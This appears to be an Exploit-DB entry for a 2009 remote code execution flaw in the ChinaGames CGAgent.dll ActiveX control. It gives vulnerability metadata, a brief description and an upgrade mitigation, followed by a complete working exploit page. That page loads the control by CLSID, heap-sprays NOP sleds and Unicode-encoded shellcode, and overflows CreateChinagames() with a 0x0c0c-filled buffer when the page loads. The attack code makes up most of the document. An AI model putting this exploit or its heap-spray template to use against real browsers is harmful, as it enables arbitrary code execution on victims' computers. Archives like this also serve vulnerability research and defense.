ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit

vendor:

CGAgent.dll

by:

etirah

9,3

CVSS

HIGH

Remote Code Execution

119 (Buffer Copy without Checking Size of Input)

CWE

Product Name: CGAgent.dll

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit

This exploit allows remote attackers to execute arbitrary code on vulnerable installations of ChinaGames CGAgent.dll. Authentication is not required to exploit this vulnerability. The specific flaw exists within the CreateChinagames() function of the CGAgent.dll ActiveX control. The problem is that the control fails to properly validate user-supplied input resulting in a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of the user running the browser.

Mitigation:

Upgrade to the latest version of ChinaGames CGAgent.dll or apply the appropriate patch.

Source

Exploit-DB raw data:

#
# ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit
# Exploit made by etirah
# Download: www.chinagames.com
#
# Problem DLL    :   CGAgent.dll
# Problem Func   :   CreateChinagames(param1)
# Problem Param  :   param1
#
# References:
#     1. http://bbs.pediy.com/showthread.php?t=87615
#     2. http://www.milw0rm.com/exploits/8579

<html>
<body>
<object classid="clsid:75108B29-202F-493C-86C5-1C182A485C4C" id="target"></object>

<script>
function test()
{
    var shellcode = unescape("\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6574\u7473\uc48b\u6853\u3a20\u292d\u7468\u2065\u6820\u6168\u6972\ud48b\u5053\u5352\u57ff\u53fc\u57ff\u00f8");
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace)
        bigblock+=bigblock;

    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000)
        block = block+block+fillblock;

    memory = new Array();
    for (x=0; x<300; x++)
        memory[x] = block + shellcode;
    var buffer = '';
    while (buffer.length < 796 )
        buffer+=unescape("%u0c0c");
    target.CreateChinagames(buffer);
}

test();

</script>
</body>
</html>

# milw0rm.com [2009-05-21]